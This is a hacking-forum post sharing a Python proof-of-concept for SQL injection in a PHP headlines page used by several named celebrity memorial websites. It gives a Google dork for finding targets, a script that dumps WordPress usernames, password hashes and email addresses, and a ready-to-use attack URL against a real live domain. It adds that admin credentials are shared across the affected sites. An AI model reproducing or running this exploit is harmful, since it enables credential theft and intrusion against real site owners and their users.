PoC - PHP GroupWare Headlines Admin SQLi
#1
Here's a PoC for some SQL injection which affects a bunch of sites dedicated to dead celebrities, some examples include:
  • Malcolm X
  • Marylin Monroe
  • Andre The Giant
  • Jean Harlow
  • Ella Fitzgerald
and more Smile

for a full list of sites the following google dork will work: inurl:viewheadline.php?id=

Code:
from sys import argv, exit  
from urllib import urlopen  
from re import findall                  
 
if len(argv) < 2:  
exit('Usage: python file.py http://vulnsite.com/path/')  
 
print "\n// P0ISON.ORG // POC // 17/1/2015 // \n\n"          
         
payload = 'viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,concat(user_login,0x3a,user_pass,0x3a,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from wp_users--+'        
 
arg = argv[1]  
 
if arg[0:7] != "http://":  
url = "http://" + str(arg)                                                                                                                                                        
else:                        
url = arg  
 
data = urlopen(url + str(payload)).read()  
 
matches = findall(r"<span class=\"newstitle\">(.*?)</span>", data)  
 
for match in matches:  
x = match.split(":")  
print "User: " + str(x[0]) + " | Password: " + str(x[1]) + " | E-mail: " + str(x[2]) + "\n"

Working example:

Code:
http://www.cmgww.com/stars/monroe/about/viewheadline.php?id=1344viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+%27

something funny to note is that the admin hash and usernames of admin accounts is the SAME for all affected websites. In addition to this, the column count is static so the PoC will work the same for all affected sites without need for modifications to the source or a method for determining the column count.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] PHP CGI exploit Insider 0 489 06-16-2020, 11:34 AM
Last Post: Insider
  [SQLi] Blind SQLi queries Insider 0 502 06-16-2020, 04:00 AM
Last Post: Insider
  POC for XML-PRC ? h3x0r 1 5,883 05-20-2019, 01:11 PM
Last Post: Insider
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,754 04-24-2019, 08:47 PM
Last Post: thunder